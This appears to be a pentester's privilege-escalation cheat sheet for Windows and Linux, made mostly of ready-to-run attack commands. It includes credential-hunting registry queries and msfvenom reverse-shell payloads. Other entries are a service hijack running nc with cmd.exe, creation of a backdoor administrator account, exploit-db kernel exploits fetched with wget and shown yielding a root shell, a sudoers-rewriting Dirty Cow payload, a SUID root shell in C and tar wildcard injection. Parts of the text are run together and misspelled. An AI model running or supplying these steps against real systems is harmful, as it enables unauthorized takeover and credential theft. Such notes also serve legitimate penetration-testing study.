Privilege Esclation Cheatsheet
Windows
Scripts
- JAWS
- Sherlock
- Powerup
Kernel Exploits
systeminfo
-> look up missing kb'ssysteminfo | findstr /B /C:"OS Name" /C:"OS * Version"
sherlock
-> Find-AllVulns powershell
Common Kernel Exploits
- MS16-014 - applies to: Windows 7 SP1 x86
- MS16-016 - 'WebDAV' applies to Windows 7 SP1 x86 (Build 7601)
- MS16-032 - applies to: Windows 7 x86/x64, Windows 8 x86/64, Windows 10, Windows Server 2008-2012 R2
Config files
- creds in cleartext or base64 -> once windows in installed
c:\sysprep.inf
c:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
GPP (Group Policy Preferences)
Only applicable for devices connected to a domain
Groups.xml
stored inSYSVOL
-> DC- encrypted with AES, but key got leaked
\\dc2018.lab\SYSVOL\dc2008.lab\Policies\{id}\MACHINE\Preferences\Groups
Other Files
Services\Services.xml
ScheduldedTasks\ScheduledTasks.xml
Printers\Printers.xml
Drives\Drives.xml
DataSources\DataSources.xml
Other Misc Passwords
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
web.config
php.ini
httpd.conf
access.log
- powerup:
Get-WebConfig
(ISS >web.config
)
putty:
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
Tight VNC:
reg query HKCU\Software\TightVNC\Server
bncpwd.exe <encrypted_password>
Always Install Elevated:
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstalledElevated
reg query HKCU\SOFTWARE\Policies\Micorosft\Windows\Installer\AlwaysInstalledElevated
- both values =
1
, created a malicious.msi
file withmsfvenom
for example - execute it with
msiexec /quiet /qn /i <filename.msi>
- both values =
powerup:
Get-RegistryAlwaysInstallElevated
Write-UserAddMSI
Unquoted Services Paths (trusted service paths)
For each space in a file path, windows will attempt to look for and execute programs with a name that matches the word in front of the space.
Example:
- C:\Program Files\Some Folder\Service.exe
- C:\Program.exe
- C:\Program Files\Some.exe
- C:\Program Files\Some Folder\Service.exe
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
PFNet
C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfscv.exe
icalcs "C:\Program Files (x86)\Privacyware"
msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=10.0.0.100 LPORT=443 -f exe -o Privatefirewall.exe
Start and stop the service:
sc stop PFNet
sc start PFNET
Powerup:
Get-ServiceUnquoted
Write-ServiceBinary -Name <service_name> -Path <hijack_path>
Insecure Service Permissions
-
whoami > net user <name>
- enumerate groups -
accesschk.exe
-> part of sysinternals -
accesschk.exe -ucqv <service name>
-
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
Write access to a service as authenticated user?
W-XP ssdprsv
and upnphost
by default:
sc qc upnphost
sc config upnphost binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
net start upnphost
Powerup:
Get-ModifiableService
Test-ServiceDaclPermission
Invoke-ServiceAbuse -Name <service_name> -Command <command>
Weak folder permissions
DLL Hijacking
Requires user interaction / reboot.
DLL search order on 32-bit systems:
- The directory from which the application is loaded
- 32-bit System directory (C:\Windows\System32)
- 16-bit System directory (C:\Windows\System)
- Windows directory (C:\Windows)
- The current working directory
- Directories in the PATH environment variable
You can use procmon
to look for vulnerable dll's using the following filters:
- Result is NAME NOT FOUND Include
- Path ends with .dll
echo %path%
icacls C:\Python27
accesssschk.exe -dqv "C:\Python27"
sc qc IKEEXT
Generate a malicious payload with msfvenom
:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<ip> lport=<port> -f dll > evil.dll
Windows 7 x86/64:
- IKE and AuthIP IPsec Keying Modules (IKEEEXT) -
wlbsctrl.dll
Powerup:
Find-PathDLLHijkack
Find-ProjcessDLLHijkack
Wire-HijkackDll
Schedulded tasks:
On server 2000, 2003, and XP, scheduled tasks are running as system. Are they calling any .exe
's and can you overwrite?
accesschk.exe -dqv <folder path>
Can you create a task yourself?
net start "Task Scheduler" at <hour:minute> /interactive "path to evil exe"
Powerup:
Get-ModifiableScheduledTaskFile
Useful commands
hostname
echo %username%
whoami
/priv
swinsta
- other logged in usersnet users
net user <username>
net localgroup
net localgroup Administrators
net user rottenadmin P@ssword123! /add
net localgroup Administrators rottenadmin /add
ipconfing /all
route print
arp -a
netstat -ano
C:\WINDOWS\System32\drivers\etc\hosts
schtasks /query /fo LIST /v
- scheduled tasktasklist /SVC
- running processesnet start
- started servicescd\ & dir /b /s proof.txt
Linux
- not added -> ld_preload - URL
Scripts
Linux-Enum-Mod
linux-exploit-suggestor
Kernel Exploits
uname -a
->searchsploit
linux-exploit-suggestor
Common Kernel Exploits
CVE-2010-2959
- 'CAN BCM' Privilege Escalation - Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32)
wget -O i-can-haz-modharden.c http://www.exploit-db.com/download/14814
$ gcc i-can-haz-modharden.c -o i-can-haz-modharden
$ ./i-can-haz-modharden
[+] launching root shell!
# id
uid=0(root) gid=0(root)
CVE-2010-3904
- Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8CVE-2012-0056
- Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)
wget -O exploit.c http://www.exploit-db.com/download/18411
gcc -o mempodipper exploit.c
./mempodipper
CVE-2016-5195
- Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
root
Services Running as ps -aux | grep root
- any shell escape sequences?
SUID Executables
- runs with permissions of the owner
find / -perm -u=s -type f 2>/dev/null
- any shell escape sequences - do we have write access?
Sudo rights / users
sudo -l
- what can we execute -> any shell escape sequences
Cron jobs
find / -perm -2 -type f 2>/dev/null
ls -la /etc/cron.d
# rootme.c
int main(void)
{
setgid(0);
setuid(0);
execl("/bin/sh", "sh", 0);
}
gcc rootme.c -o rootme
echo "chown root:root /tmp/rootme; chmod u+s /tmp/rootme;" > /usr/local/sbin/cron-logrotate.sh
Wildcards
- often combined with user interaction / cronjobs
- cfr. Back to the Future: Unix Wildcards Gone Wild paper
- wild cards can be utilized to inject arbitrary command by creating files that are seen as commands
Example:
--checkpoint=<number> and --checkpoint-action=<command>
--checkpoint=1 and --checkpoint-actionexec=sh rshell.sh
Path Abuse ('.' in path)
Requires user interaction (eg somebody need to have .
in their path)
$PATH:.:${PATH}
export $PATH
echo $PATH
- replace executable files with a malicious one
Useful commands
ps aux | grep root
crontab -l
ifconfig -a
cat /etc/resolv.conf
netstat -tulpn
arp -e
route
id
who
cat /etc/passwd | cut -d: -f1
- list of userscat ~/.ssh
find . -name package.json -print -exec cat {} +
Sources
- https://www.fuzzysecurity.com/tutorials/16.html
- https://toshellandback.com/2015/11/24/ms-priv-esc/
- https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
- https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/
- https://payatu.com/guide-linux-privilege-escalation/#
- https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
- https://github.com/sagishahar/lpeworkshop